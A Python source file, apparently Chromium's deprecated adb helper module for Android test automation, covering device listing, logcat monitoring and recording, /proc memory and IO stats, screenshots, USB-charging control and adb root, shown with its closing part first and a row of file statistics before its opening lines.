    args += shlex.split(self._adb._target_arg)
  args += ['logcat', '-v', 'threadtime']
  if filters:
    args.extend(filters)
  else:
    args.append('*:v')

  if logfile:
    logfile = NewLineNormalizer(logfile)

  # Spawn logcat and synchronize with it; retry a few times since the
  # initial sync marker can be missed.
  for _ in range(4):
    self._logcat = pexpect.spawn(constants.GetAdbPath(), args, timeout=10,
                                 logfile=logfile)
    if not clear or self.SyncLogCat():
      break
    self._logcat.close(force=True)
  else:
    logging.critical('Error reading from logcat: ' + str(self._logcat.match))
    sys.exit(1)
def SyncLogCat(self):
  """Synchronize with logcat.

  Synchronize with the monitored logcat so that WaitForLogMatch will only
  consider new messages that are received after this point in time.

  Returns:
    True if the synchronization succeeded.
  """
  assert self._logcat
  # Emit a unique marker into the device log, then wait until the monitored
  # logcat stream echoes it back.
  tag = 'logcat_sync_%s' % time.time()
  self.RunShellCommand('log ' + tag)
  return self._logcat.expect([tag, pexpect.EOF, pexpect.TIMEOUT]) == 0
def GetMonitoredLogCat(self):
  """Returns an "adb logcat" command as created by pexpect.spawn."""
  # Start monitoring lazily if nobody has done so yet; keep the existing
  # buffered output (clear=False).
  if not self._logcat:
    self.StartMonitoringLogcat(clear=False)
  return self._logcat
def WaitForLogMatch(self, success_re, error_re, clear=False, timeout=10):
  """Blocks until a matching line is logged or a timeout occurs.

  Args:
    success_re: A compiled re to search each line for.
    error_re: A compiled re which, if found, terminates the search for
        |success_re|. If None is given, no error condition will be detected.
    clear: If True the existing logcat output will be cleared, defaults to
        false.
    timeout: Timeout in seconds to wait for a log match.

  Raises:
    pexpect.TIMEOUT after |timeout| seconds without a match for |success_re|
    or |error_re|.

  Returns:
    The re match object if |success_re| is matched first or None if |error_re|
    is matched first.
  """
  logging.info('<<< Waiting for logcat:' + str(success_re.pattern))
  t0 = time.time()
  while True:
    if not self._logcat:
      self.StartMonitoringLogcat(clear)
    try:
      while True:
        # Note this will block for upto the timeout _per log line_, so we need
        # to calculate the overall timeout remaining since t0.
        time_remaining = t0 + timeout - time.time()
        if time_remaining < 0:
          raise pexpect.TIMEOUT(self._logcat)
        self._logcat.expect(PEXPECT_LINE_RE, timeout=time_remaining)
        line = self._logcat.match.group(1)
        if error_re:
          error_match = error_re.search(line)
          if error_match:
            return None
        success_match = success_re.search(line)
        if success_match:
          return success_match
        logging.info('<<< Skipped Logcat Line:' + str(line))
    except pexpect.TIMEOUT:
      raise pexpect.TIMEOUT(
          'Timeout (%ds) exceeded waiting for pattern "%s" (tip: use -vv '
          'to debug)' %
          (timeout, success_re.pattern))
    except pexpect.EOF:
      # It seems that sometimes logcat can end unexpectedly. This seems
      # to happen during Chrome startup after a reboot followed by a cache
      # clean. I don't understand why this happens, but this code deals with
      # getting EOF in logcat.
      logging.critical('Found EOF in adb logcat. Restarting...')
      # Rerun spawn with original arguments. Note that self._logcat.args[0] is
      # the path of adb, so we don't want it in the arguments.
      self._logcat = pexpect.spawn(constants.GetAdbPath(),
                                   self._logcat.args[1:],
                                   timeout=self._logcat.timeout,
                                   logfile=self._logcat.logfile)
def StartRecordingLogcat(self, clear=True, filters=None):
  """Starts recording logcat output to eventually be saved as a string.

  This call should come before some series of tests are run, with either
  StopRecordingLogcat or SearchLogcatRecord following the tests.

  Args:
    clear: True if existing log output should be cleared.
    filters: A list of logcat filters to be used.
  """
  if not filters:
    filters = ['*:v']
  if clear:
    self._adb.SendCommand('logcat -c')
  logcat_command = 'adb %s logcat -v threadtime %s' % (self._adb._target_arg,
                                                       ' '.join(filters))
  # bufsize=0 keeps the temp file unbuffered so GetCurrentRecordedLogcat
  # sees the subprocess output immediately.
  self._logcat_tmpoutfile = tempfile.NamedTemporaryFile(bufsize=0)
  self.logcat_process = subprocess.Popen(logcat_command, shell=True,
                                         stdout=self._logcat_tmpoutfile)
def GetCurrentRecordedLogcat(self):
  """Return the current content of the logcat being recorded.

  Call this after StartRecordingLogcat() and before StopRecordingLogcat().
  This can be useful to perform timed polling/parsing.

  Returns:
    Current logcat output as a single string, or None if
    StopRecordingLogcat() was already called.
  """
  if not self._logcat_tmpoutfile:
    return None

  # Re-open by name so the recording subprocess's file position is untouched.
  with open(self._logcat_tmpoutfile.name) as f:
    return f.read()
def StopRecordingLogcat(self):
  """Stops an existing logcat recording subprocess and returns output.

  Returns:
    The logcat output as a string or an empty string if logcat was not
    being recorded at the time.
  """
  if not self.logcat_process:
    return ''
  # Cannot evaluate directly as 0 is a possible value.
  # Better to read the self.logcat_process.stdout before killing it,
  # Otherwise the communicate may return incomplete output due to pipe break.
  if self.logcat_process.poll() is None:
    self.logcat_process.kill()
  self.logcat_process.wait()
  self.logcat_process = None
  # Rewind and drain the temp file the subprocess was writing to, then
  # release it.
  self._logcat_tmpoutfile.seek(0)
  output = self._logcat_tmpoutfile.read()
  self._logcat_tmpoutfile.close()
  self._logcat_tmpoutfile = None
  return output
@staticmethod
def SearchLogcatRecord(record, message, thread_id=None, proc_id=None,
log_level=None, component=None):
"""Searches the specified logcat output and returns results.
This method searches through the logcat output specified by record for a
certain message, narrowing results by matching them against any other
specified criteria. It returns all matching lines as described below.
Args:
record: A string generated by Start/StopRecordingLogcat to search.
message: An output string to search for.
thread_id: The thread id that is the origin of the message.
proc_id: The process that is the origin of the message.
log_level: The log level of the message.
component: The name of the component that would create the message.
Returns:
A list of dictionaries represeting matching entries, each containing keys
thread_id, proc_id, log_level, component, and message.
"""
if thread_id:
thread_id = str(thread_id)
if proc_id:
proc_id = str(proc_id)
results = []
reg = re.compile('(\d+)\s+(\d+)\s+([A-Z])\s+([A-Za-z]+)\s*:(.*)$',
re.MULTILINE)
log_list = reg.findall(record)
for (tid, pid, log_lev, comp, msg) in log_list:
if ((not thread_id or thread_id == tid) and
(not proc_id or proc_id == pid) and
(not log_level or log_level == log_lev) and
(not component or component == comp) and msg.find(message) > -1):
match = dict({'thread_id': tid, 'proc_id': pid,
'log_level': log_lev, 'component': comp,
'message': msg})
results.append(match)
return results
def ExtractPid(self, process_name):
  """Extracts Process Ids for a given process name from Android Shell.

  Args:
    process_name: name of the process on the device.

  Returns:
    List of all the process ids (as strings) that match the given name.
    If the name of a process exactly matches the given name, the pid of
    that process will be inserted to the front of the pid list.
  """
  pids = []
  for line in self.RunShellCommand('ps', log_result=False):
    data = line.split()
    try:
      if process_name in data[-1]:  # name is in the last column
        if process_name == data[-1]:
          # Exact matches take priority over substring matches.
          pids.insert(0, data[1])  # PID is in the second column
        else:
          pids.append(data[1])
    except IndexError:
      # Skip malformed/empty ps lines.
      pass
  return pids
def GetIoStats(self):
  """Gets cumulative disk IO stats since boot (for all processes).

  Returns:
    Dict of {num_reads, num_writes, read_ms, write_ms} or None if there
    was an error.
  """
  # Field layout of a /proc/diskstats line after the major/minor numbers.
  IoStats = collections.namedtuple(
      'IoStats',
      ['device',
       'num_reads_issued',
       'num_reads_merged',
       'num_sectors_read',
       'ms_spent_reading',
       'num_writes_completed',
       'num_writes_merged',
       'num_sectors_written',
       'ms_spent_writing',
       'num_ios_in_progress',
       'ms_spent_doing_io',
       'ms_spent_doing_io_weighted',
      ])

  for line in self.GetFileContents('/proc/diskstats', log_result=False):
    fields = line.split()
    stats = IoStats._make([fields[2]] + [int(f) for f in fields[3:]])
    # mmcblk0 is assumed to be the device's primary internal storage.
    if stats.device == 'mmcblk0':
      return {
          'num_reads': stats.num_reads_issued,
          'num_writes': stats.num_writes_completed,
          'read_ms': stats.ms_spent_reading,
          'write_ms': stats.ms_spent_writing,
      }
  logging.warning('Could not find disk IO stats.')
  return None
def GetMemoryUsageForPid(self, pid):
  """Returns the memory usage for given pid.

  Args:
    pid: The pid number of the specific process running on device.

  Returns:
    Dict of {metric:usage_kb}, for the process which has specified pid.
    The metric keys which may be included are: Size, Rss, Pss, Shared_Clean,
    Shared_Dirty, Private_Clean, Private_Dirty, VmHWM.
  """
  showmap = self.RunShellCommand('showmap %d' % pid)
  if not showmap or not showmap[-1].endswith('TOTAL'):
    logging.warning('Invalid output for showmap %s', str(showmap))
    return {}
  items = showmap[-1].split()
  # The TOTAL line must contain 8 numeric columns plus the 'TOTAL' label.
  if len(items) != 9:
    logging.warning('Invalid TOTAL for showmap %s', str(items))
    return {}
  usage_dict = collections.defaultdict(int)
  usage_dict.update({
      'Size': int(items[0].strip()),
      'Rss': int(items[1].strip()),
      'Pss': int(items[2].strip()),
      'Shared_Clean': int(items[3].strip()),
      'Shared_Dirty': int(items[4].strip()),
      'Private_Clean': int(items[5].strip()),
      'Private_Dirty': int(items[6].strip()),
  })
  # VmHWM (peak resident set size) is read from the kernel status file.
  peak_value_kb = 0
  for line in self.GetProtectedFileContents('/proc/%s/status' % pid):
    if not line.startswith('VmHWM:'):  # Format: 'VmHWM:  +[0-9]+ kB'
      continue
    peak_value_kb = int(line.split(':')[1].strip().split(' ')[0])
    break
  usage_dict['VmHWM'] = peak_value_kb
  if not peak_value_kb:
    logging.warning('Could not find memory peak value for pid ' + str(pid))

  return usage_dict
def ProcessesUsingDevicePort(self, device_port):
  """Lists processes using the specified device port on loopback interface.

  Args:
    device_port: Port on device we want to check.

  Returns:
    A list of (pid, process_name) tuples using the specified port.
  """
  tcp_results = self.RunShellCommand('cat /proc/net/tcp', log_result=False)
  # 0100007F is 127.0.0.1 in the little-endian hex notation of /proc/net/tcp.
  tcp_address = '0100007F:%04X' % device_port
  pids = []
  for single_connect in tcp_results:
    connect_results = single_connect.split()
    # Column 1 is the TCP port, and Column 9 is the inode of the socket
    if connect_results[1] == tcp_address:
      socket_inode = connect_results[9]
      socket_name = 'socket:[%s]' % socket_inode
      lsof_results = self.RunShellCommand('lsof', log_result=False)
      for single_process in lsof_results:
        process_results = single_process.split()
        # Ignore the line if it has less than nine columns in it, which may
        # be the case when a process stops while lsof is executing.
        if len(process_results) <= 8:
          continue
        # Column 0 is the executable name
        # Column 1 is the pid
        # Column 8 is the Inode in use
        if process_results[8] == socket_name:
          pids.append((int(process_results[1]), process_results[0]))
          break
  logging.info('PidsUsingDevicePort: %s', pids)

  return pids
def FileExistsOnDevice(self, file_name):
  """Checks whether the given file exists on the device.

  Args:
    file_name: Full path of file to check.

  Returns:
    True if the file exists, False otherwise.
  """
  assert '"' not in file_name, 'file_name cannot contain double quotes'
  try:
    status = self._adb.SendShellCommand(
        '\'test -e "%s"; echo $?\'' % (file_name))
    if 'test: not found' not in status:
      return int(status) == 0

    # Older OS images may lack the 'test' binary; fall back to ls.
    status = self._adb.SendShellCommand(
        '\'ls "%s" >/dev/null 2>&1; echo $?\'' % (file_name))
    return int(status) == 0
  except ValueError:
    # A non-numeric echo means the shell itself failed to respond.
    if IsDeviceAttached(self._device):
      raise errors.DeviceUnresponsiveError('Device may be offline.')

    return False
def IsFileWritableOnDevice(self, file_name):
  """Checks whether the given file (or directory) is writable on the device.

  Args:
    file_name: Full path of file/directory to check.

  Returns:
    True if writable, False otherwise.
  """
  assert '"' not in file_name, 'file_name cannot contain double quotes'
  try:
    status = self._adb.SendShellCommand(
        '\'test -w "%s"; echo $?\'' % (file_name))
    if 'test: not found' not in status:
      return int(status) == 0
    # Unlike FileExistsOnDevice there is no ls fallback for writability.
    raise errors.AbortError('"test" binary not found. OS too old.')
  except ValueError:
    # A non-numeric echo means the shell itself failed to respond.
    if IsDeviceAttached(self._device):
      raise errors.DeviceUnresponsiveError('Device may be offline.')

    return False
@staticmethod
def GetTimestamp():
return time.strftime('%Y-%m-%d-%H%M%S', time.localtime())
@staticmethod
def EnsureHostDirectory(host_file):
host_dir = os.path.dirname(os.path.abspath(host_file))
if not os.path.exists(host_dir):
os.makedirs(host_dir)
def TakeScreenshot(self, host_file=None):
  """Saves a screenshot image to |host_file| on the host.

  Args:
    host_file: Absolute path to the image file to store on the host or None to
               use an autogenerated file name.

  Returns:
    Resulting host file name of the screenshot.
  """
  host_file = os.path.abspath(host_file or
                              'screenshot-%s.png' % self.GetTimestamp())
  self.EnsureHostDirectory(host_file)
  device_file = '%s/screenshot.png' % self.GetExternalStorage()
  # Capture on the device, pull to the host, then delete the device copy.
  self.RunShellCommand(
      '/system/bin/screencap -p %s' % device_file)
  self.PullFileFromDevice(device_file, host_file)
  self.RunShellCommand('rm -f "%s"' % device_file)
  return host_file
def PullFileFromDevice(self, device_file, host_file):
  """Download |device_file| on the device to |host_file| on the host.

  Args:
    device_file: Absolute path to the file to retrieve from the device.
    host_file: Absolute path to the file to store on the host.

  Raises:
    device_errors.AdbCommandFailedError: If the adb pull fails.
  """
  if not self._adb.Pull(device_file, host_file):
    raise device_errors.AdbCommandFailedError(
        ['pull', device_file, host_file], 'Failed to pull file from device.')
  assert os.path.exists(host_file)
def SetUtilWrapper(self, util_wrapper):
  """Sets a wrapper prefix to be used when running a locally-built
  binary on the device (ex.: md5sum_bin).

  Args:
    util_wrapper: Command prefix string prepended to such invocations.
  """
  self._util_wrapper = util_wrapper
def RunUIAutomatorTest(self, test, test_package, timeout):
  """Runs a single uiautomator test.

  Args:
    test: Test class/method.
    test_package: Name of the test jar.
    timeout: Timeout time in seconds.

  Returns:
    An instance of am_instrument_parser.TestResult object.

  Raises:
    errors.InstrumentationError: If no test results could be parsed.
  """
  cmd = 'uiautomator runtest %s -e class %s' % (test_package, test)
  self._LogShell(cmd)
  output = self._adb.SendShellCommand(cmd, timeout_time=timeout)
  # uiautomator doesn't fully conform to the instrumentation test runner
  # convention and doesn't terminate with INSTRUMENTATION_CODE.
  # Just assume the first result is valid.
  (test_results, _) = am_instrument_parser.ParseAmInstrumentOutput(output)
  if not test_results:
    raise errors.InstrumentationError(
        'no test results... device setup correctly?')
  return test_results[0]
def DismissCrashDialogIfNeeded(self):
  """Dismiss the error/ANR dialog if present.

  Returns: Name of the crashed package if a dialog is focused,
           None otherwise.
  """
  re_focus = re.compile(
      r'\s*mCurrentFocus.*Application (Error|Not Responding): (\S+)}')

  def _FindFocusedWindow():
    # Returns the regex match for a focused crash/ANR dialog, if any.
    match = None
    for line in self.RunShellCommand('dumpsys window windows'):
      match = re.match(re_focus, line)
      if match:
        break
    return match

  match = _FindFocusedWindow()
  if not match:
    return
  package = match.group(2)
  logging.warning('Trying to dismiss %s dialog for %s' % match.groups())
  # Navigate to the dialog's confirmation button and press it.
  self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
  self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
  self.SendKeyEvent(KEYCODE_ENTER)
  match = _FindFocusedWindow()
  if match:
    logging.error('Still showing a %s dialog for %s' % match.groups())
  return package
def EfficientDeviceDirectoryCopy(self, source, dest):
  """Copy a directory efficiently on the device.

  Uses a shell script running on the target to copy new and changed files the
  source directory to the destination directory and remove added files. This
  is in some cases much faster than cp -r.

  Args:
    source: absolute path of source directory
    dest: absolute path of destination directory
  """
  logging.info('In EfficientDeviceDirectoryCopy %s %s', source, dest)
  with DeviceTempFile(self, suffix=".sh") as temp_script_file:
    host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
                                    'build',
                                    'android',
                                    'pylib',
                                    'efficient_android_directory_copy.sh')
    self._adb.Push(host_script_path, temp_script_file.name)
    out = self.RunShellCommand(
        'sh %s %s %s' % (temp_script_file.name, source, dest),
        timeout_time=120)
    # Mirror the script output into the host log, tagged with the last four
    # characters of the device serial.
    if self._device:
      device_repr = self._device[-4:]
    else:
      device_repr = '????'
    for line in out:
      logging.info('[%s]> %s', device_repr, line)
def _GetControlUsbChargingCommand(self):
  """Resolves (once) and returns the USB charging control command entry.

  Returns:
    The matching CONTROL_USB_CHARGING_COMMANDS entry, or None when root is
    unavailable or none of the known witness files exist on the device.
  """
  if self._control_usb_charging_command['cached']:
    return self._control_usb_charging_command['command']
  self._control_usb_charging_command['cached'] = True
  # The sysfs control files require root to write.
  if not self.IsRootEnabled():
    return None
  for command in CONTROL_USB_CHARGING_COMMANDS:
    # Assert command is valid.
    assert 'disable_command' in command
    assert 'enable_command' in command
    assert 'witness_file' in command
    witness_file = command['witness_file']
    if self.FileExistsOnDevice(witness_file):
      self._control_usb_charging_command['command'] = command
      return command
  return None
def CanControlUsbCharging(self):
  """Returns True if this device exposes a known USB-charging control file."""
  return self._GetControlUsbChargingCommand() is not None
def DisableUsbCharging(self, timeout=10):
  """Disables USB charging on the device.

  Args:
    timeout: Seconds to wait for the battery to report as not charging.

  Raises:
    Exception: If the device cannot control USB charging.
    pexpect.TIMEOUT: If charging is still active after |timeout|.
  """
  command = self._GetControlUsbChargingCommand()
  if not command:
    raise Exception('Unable to act on usb charging.')
  disable_command = command['disable_command']
  t0 = time.time()
  # Do not loop directly on self.IsDeviceCharging to cut the number of calls
  # to the device.
  while True:
    if t0 + timeout - time.time() < 0:
      raise pexpect.TIMEOUT('Unable to disable USB charging in time: %s' % (
          self.GetBatteryInfo()))
    self.RunShellCommand(disable_command)
    if not self.IsDeviceCharging():
      break
def EnableUsbCharging(self, timeout=10):
  """Enables USB charging on the device.

  Args:
    timeout: Seconds to wait for the battery to report as charging.

  Raises:
    Exception: If the device cannot control USB charging.
    pexpect.TIMEOUT: If charging is not re-enabled within |timeout|.
  """
  command = self._GetControlUsbChargingCommand()
  if not command:
    raise Exception('Unable to act on usb charging.')
  # This local was previously misnamed 'disable_command'.
  enable_command = command['enable_command']
  t0 = time.time()
  # Do not loop directly on self.IsDeviceCharging to cut the number of calls
  # to the device.
  while True:
    if t0 + timeout - time.time() < 0:
      # Include battery state in the message, matching DisableUsbCharging.
      raise pexpect.TIMEOUT('Unable to enable USB charging in time: %s' % (
          self.GetBatteryInfo()))
    self.RunShellCommand(enable_command)
    if self.IsDeviceCharging():
      break
def IsDeviceCharging(self):
  """Returns whether 'dumpsys battery' reports a connected power source.

  Returns:
    True if a 'powered: true' line is present; False otherwise (the
    original implementation implicitly fell through and returned None).
  """
  for line in self.RunShellCommand('dumpsys battery'):
    if 'powered: ' in line:
      if line.split('powered: ')[1] == 'true':
        return True
  return False
class NewLineNormalizer(object):
  """A file-like wrapper that rewrites pseudo-tty line endings to '\n'.

  Pexpect runs adb within a pseudo-tty device (see
  http://www.noah.org/wiki/pexpect), so any '\n' printed by adb is written
  as '\r\n' to the logfile. Since adb already uses '\r\n' to terminate
  lines, the log ends up having '\r\r\n' at the end of each line. This
  wrapper collapses the above to a single '\n' before delegating to the
  wrapped stream.
  """

  def __init__(self, output):
    # Underlying stream that receives the normalized data.
    self._output = output

  def write(self, data):
    self._output.write(data.replace('\r\r\n', '\n'))

  def flush(self):
    self._output.flush()
| 36.983814
| 80
| 0.659983
|
"""Provides an interface to communicate with the device via the adb command.
Assumes adb binary is currently on system path.
Note that this module is deprecated.
"""
import collections
import datetime
import inspect
import logging
import os
import random
import re
import shlex
import signal
import subprocess
import sys
import tempfile
import time
import cmd_helper
import constants
import system_properties
from utils import host_utils
try:
from pylib import pexpect
except ImportError:
pexpect = None
sys.path.append(os.path.join(
constants.DIR_SOURCE_ROOT, 'third_party', 'android_testrunner'))
import adb_interface
import am_instrument_parser
import errors
from pylib.device import device_blacklist
from pylib.device import device_errors
# Pattern used to pull individual lines out of pexpect-captured logcat output;
# see http://www.noah.org/python/pexpect/#doc for explanation why.
PEXPECT_LINE_RE = re.compile('\n([^\r]*)\r')

# Set the adb shell prompt to be a unique marker that will [hopefully] not
# appear at the start of any line of a command's output.
SHELL_PROMPT = '~+~PQ\x17RS~+~'

LOCAL_PROPERTIES_PATH = constants.DEVICE_LOCAL_PROPERTIES_PATH

# System property controlling Dalvik assertions; see SetJavaAssertsEnabled.
JAVA_ASSERT_PROPERTY = 'dalvik.vm.enableassertions'

# Android KeyEvent codes, used with SendKeyEvent (e.g. to dismiss dialogs).
KEYCODE_HOME = 3
KEYCODE_BACK = 4
KEYCODE_DPAD_UP = 19
KEYCODE_DPAD_DOWN = 20
KEYCODE_DPAD_RIGHT = 22
KEYCODE_ENTER = 66
KEYCODE_MENU = 82

# On-device locations of the md5sum helper binary and the PIE loader wrapper.
MD5SUM_DEVICE_FOLDER = constants.TEST_EXECUTABLE_DIR + '/md5sum/'
MD5SUM_DEVICE_PATH = MD5SUM_DEVICE_FOLDER + 'md5sum_bin'
PIE_WRAPPER_PATH = constants.TEST_EXECUTABLE_DIR + '/run_pie'

# Known sysfs interfaces for toggling USB charging. The first entry whose
# witness_file exists on the device is used; see _GetControlUsbChargingCommand.
CONTROL_USB_CHARGING_COMMANDS = [
  {
    'witness_file': '/sys/module/pm8921_charger/parameters/disabled',
    'enable_command': 'echo 0 > /sys/module/pm8921_charger/parameters/disabled',
    'disable_command':
        'echo 1 > /sys/module/pm8921_charger/parameters/disabled',
  },
  {
    'witness_file': '/sys/kernel/debug/bq24192/INPUT_SRC_CONT',
    'enable_command': (
        'echo 0x4A > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
        'echo 1 > /sys/class/power_supply/usb/online'),
    'disable_command': (
        'echo 0xCA > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
        'chmod 644 /sys/class/power_supply/usb/online && '
        'echo 0 > /sys/class/power_supply/usb/online'),
  },
]
class DeviceTempFile(object):
  """Context manager for a temporary file on the device's external storage."""

  def __init__(self, android_commands, prefix='temp_file', suffix=''):
    """Find an unused temporary file path in the devices external directory.

    When this object is closed, the file will be deleted on the device.
    """
    self.android_commands = android_commands
    while True:
      # The timestamp plus random component make a collision with another
      # process expected to never happen.
      i = random.randint(0, 1000000)
      self.name = '%s/%s-%d-%010d%s' % (
          android_commands.GetExternalStorage(),
          prefix, int(time.time()), i, suffix)
      if not android_commands.FileExistsOnDevice(self.name):
        break

  def __enter__(self):
    return self

  def __exit__(self, type, value, traceback):
    self.close()

  def close(self):
    # Best-effort removal of the backing file on the device.
    self.android_commands.RunShellCommand('rm ' + self.name)
def GetAVDs():
  """Returns a list of AVDs."""
  # Matches the '    Name: <avd-name>' lines of 'android list avd' output.
  re_avd = re.compile('^[ ]+Name: ([a-zA-Z0-9_:.-]+)', re.MULTILINE)
  avds = re_avd.findall(cmd_helper.GetCmdOutput(['android', 'list', 'avd']))
  return avds
def ResetBadDevices():
  """Removes the blacklist that keeps track of bad devices for a current
  build.
  """
  # Delegates to the shared blacklist module consulted by GetAttachedDevices.
  device_blacklist.ResetBlacklist()
def ExtendBadDevices(devices):
  """Adds devices to the blacklist that keeps track of bad devices for a
  current build.

  The devices listed in the bad devices file will not be returned by
  GetAttachedDevices.

  Args:
    devices: list of bad devices to be added to the bad devices file.
  """
  device_blacklist.ExtendBlacklist(devices)
def GetAttachedDevices(hardware=True, emulator=True, offline=False):
  """Returns a list of attached, android devices and emulators.

  If a preferred device has been set with ANDROID_SERIAL, it will be first in
  the returned list. The arguments specify what devices to include in the list.

  Example output:

    * daemon not running. starting it now on port 5037 *
    * daemon started successfully *
    List of devices attached
    027c10494100b4d7        device
    emulator-5554   offline

  Args:
    hardware: Include attached actual devices that are online.
    emulator: Include emulators (i.e. AVD's) currently on host.
    offline: Include devices and emulators that are offline.

  Returns: List of devices.
  """
  adb_devices_output = cmd_helper.GetCmdOutput([constants.GetAdbPath(),
                                                'devices'])

  # Parse serials out of 'adb devices' output per device state.
  re_device = re.compile('^([a-zA-Z0-9_:.-]+)\tdevice$', re.MULTILINE)
  online_devices = re_device.findall(adb_devices_output)

  re_device = re.compile('^(emulator-[0-9]+)\tdevice', re.MULTILINE)
  emulator_devices = re_device.findall(adb_devices_output)

  re_device = re.compile('^([a-zA-Z0-9_:.-]+)\t(?:offline|unauthorized)$',
                         re.MULTILINE)
  offline_devices = re_device.findall(adb_devices_output)

  devices = []
  # First determine the set of online devices per the hardware/emulator flags.
  if hardware and emulator:
    devices = online_devices
  elif hardware:
    devices = [device for device in online_devices
               if device not in emulator_devices]
  elif emulator:
    devices = emulator_devices

  # Append offline/unauthorized devices if requested.
  if offline:
    devices = devices + offline_devices

  # Remove any devices in the blacklist for this build.
  blacklist = device_blacklist.ReadBlacklist()
  if len(blacklist):
    logging.info('Avoiding bad devices %s', ' '.join(blacklist))
    devices = [device for device in devices if device not in blacklist]

  # Move the ANDROID_SERIAL-preferred device to the front, if present.
  preferred_device = os.environ.get('ANDROID_SERIAL')
  if preferred_device in devices:
    devices.remove(preferred_device)
    devices.insert(0, preferred_device)
  return devices
def IsDeviceAttached(device):
  """Return true if the device is attached and online."""
  attached = GetAttachedDevices()
  return device in attached
def _GetFilesFromRecursiveLsOutput(path, ls_output, re_file, utc_offset=None):
  """Gets a list of files from `ls` command output.

  Python's os.walk isn't used because it doesn't work over adb shell.

  Args:
    path: The path to list.
    ls_output: A list of lines returned by an `ls -lR` command.
    re_file: A compiled regular expression which parses a line into named
        groups consisting of at minimum "filename", "date", "time", "size"
        and optionally "timezone".
    utc_offset: A 5-character string of the form +HHMM or -HHMM, where HH is a
        2-digit string giving the number of UTC offset hours, and MM is a
        2-digit string giving the number of UTC offset minutes. If the input
        utc_offset is None, will try to look for the value of "timezone" if it
        is specified in re_file.

  Returns:
    A dict of {"name": (size, lastmod), ...} where:
      name: The file name relative to |path|'s directory.
      size: The file size in bytes (0 for directories).
      lastmod: The file last modification date in UTC.
  """
  # '/path/subdir:' header lines announce the directory of following entries.
  re_directory = re.compile('^%s/(?P<dir>[^:]+):$' % re.escape(path))
  path_dir = os.path.dirname(path)

  current_dir = ''
  files = {}
  for line in ls_output:
    directory_match = re_directory.match(line)
    if directory_match:
      current_dir = directory_match.group('dir')
      continue
    file_match = re_file.match(line)
    if file_match:
      filename = os.path.join(current_dir, file_match.group('filename'))
      if filename.startswith(path_dir):
        # Report names relative to |path|'s parent directory.
        filename = filename[len(path_dir) + 1:]
      lastmod = datetime.datetime.strptime(
          file_match.group('date') + ' ' + file_match.group('time')[:5],
          '%Y-%m-%d %H:%M')
      if not utc_offset and 'timezone' in re_file.groupindex:
        utc_offset = file_match.group('timezone')
      if isinstance(utc_offset, str) and len(utc_offset) == 5:
        # Convert the device-local timestamp to UTC via the +HHMM offset.
        utc_delta = datetime.timedelta(hours=int(utc_offset[1:3]),
                                       minutes=int(utc_offset[3:5]))
        if utc_offset[0:1] == '-':
          utc_delta = -utc_delta
        lastmod -= utc_delta
      files[filename] = (int(file_match.group('size')), lastmod)
  return files
def _ParseMd5SumOutput(md5sum_output):
"""Returns a list of tuples from the provided md5sum output.
Args:
md5sum_output: output directly from md5sum binary.
Returns:
List of namedtuples with attributes |hash| and |path|, where |path| is the
absolute path to the file with an Md5Sum of |hash|.
"""
HashAndPath = collections.namedtuple('HashAndPath', ['hash', 'path'])
split_lines = [line.split(' ') for line in md5sum_output]
return [HashAndPath._make(s) for s in split_lines if len(s) == 2]
def _HasAdbPushSucceeded(command_output):
"""Returns whether adb push has succeeded from the provided output."""
if not command_output:
return True
if not re.search('^[0-9]', command_output.splitlines()[-1]):
logging.critical('PUSH FAILED: ' + command_output)
return False
return True
def GetLogTimestamp(log_line, year):
  """Returns the timestamp of the given |log_line| in the given year."""
  try:
    # Logcat lines carry 'MM-DD HH:MM:SS.mmm' (18 chars) but no year, so the
    # caller-supplied year is prepended before parsing.
    stamp = '%s-%s' % (year, log_line[:18])
    return datetime.datetime.strptime(stamp, '%Y-%m-%d %H:%M:%S.%f')
  except (ValueError, IndexError):
    logging.critical('Error reading timestamp from ' + log_line)
    return None
class AndroidCommands(object):
"""Helper class for communicating with Android device via adb."""
def __init__(self, device=None):
  """Constructor.

  Args:
    device: If given, adb commands are only sent to the device of this ID.
      Otherwise commands are sent to all attached devices.
  """
  self._adb = adb_interface.AdbInterface(constants.GetAdbPath())
  if device:
    self._adb.SetTargetSerial(device)
  self._device = device
  # pexpect handle used by Start/StopMonitoringLogcat and WaitForLogMatch.
  self._logcat = None
  # Subprocess/tempfile pair used by Start/StopRecordingLogcat.
  self.logcat_process = None
  self._logcat_tmpoutfile = None
  self._pushed_files = []
  # Cached 'date +%z' result; see GetUtcOffset.
  self._device_utc_offset = None
  # Byte counters for push bookkeeping.
  self._potential_push_size = 0
  self._actual_push_size = 0
  # Cached $EXTERNAL_STORAGE value; see GetExternalStorage.
  self._external_storage = ''
  # Optional command prefix for locally-built binaries; see SetUtilWrapper.
  self._util_wrapper = ''
  self._system_properties = system_properties.SystemProperties(self.Adb())
  self._push_if_needed_cache = {}
  # Lazily-resolved USB charging control; see _GetControlUsbChargingCommand.
  self._control_usb_charging_command = {
      'command': None,
      'cached': False,
  }
  self._protected_file_access_method_initialized = None
  self._privileged_command_runner = None
  self._pie_wrapper = None
@property
def system_properties(self):
  """Read-only access to the SystemProperties helper bound to this device."""
  return self._system_properties
def _LogShell(self, cmd):
"""Logs the adb shell command."""
if self._device:
device_repr = self._device[-4:]
else:
device_repr = '????'
logging.info('[%s]> %s', device_repr, cmd)
def Adb(self):
  """Returns our AdbInterface to avoid us wrapping all its methods."""
  # Callers can issue raw adb commands through the returned interface.
  return self._adb
def GetDevice(self):
  """Returns the device serial, or None when no device was targeted."""
  return self._device
def IsOnline(self):
  """Checks whether the device is online.

  Returns:
    True if device is in 'device' mode, False otherwise.
  """
  # Scan 'adb devices' output for a line naming this serial in 'device'
  # state.
  out = self._adb.SendCommand('devices')
  return any(self._device in line and 'device' in line
             for line in out.split('\n'))
def IsRootEnabled(self):
  """Checks if root is enabled on the device."""
  # Listing /root requires root; a non-root shell prints 'Permission denied'.
  root_test_output = self.RunShellCommand('ls /root') or ['']
  return not 'Permission denied' in root_test_output[0]
def EnableAdbRoot(self):
  """Enables adb root on the device.

  Returns:
    True: if output from executing adb root was as expected.
    False: otherwise.
  """
  if self.GetBuildType() == 'user':
    # Production ('user') builds never allow adb root.
    logging.warning("Can't enable root in production builds with type user")
    return False
  else:
    return_value = self._adb.EnableAdbRoot()
    # EnableAdbRoot inserts a call for wait-for-device only when adb logcat
    # output matches what is expected. Just to be safe add a call to
    # wait-for-device.
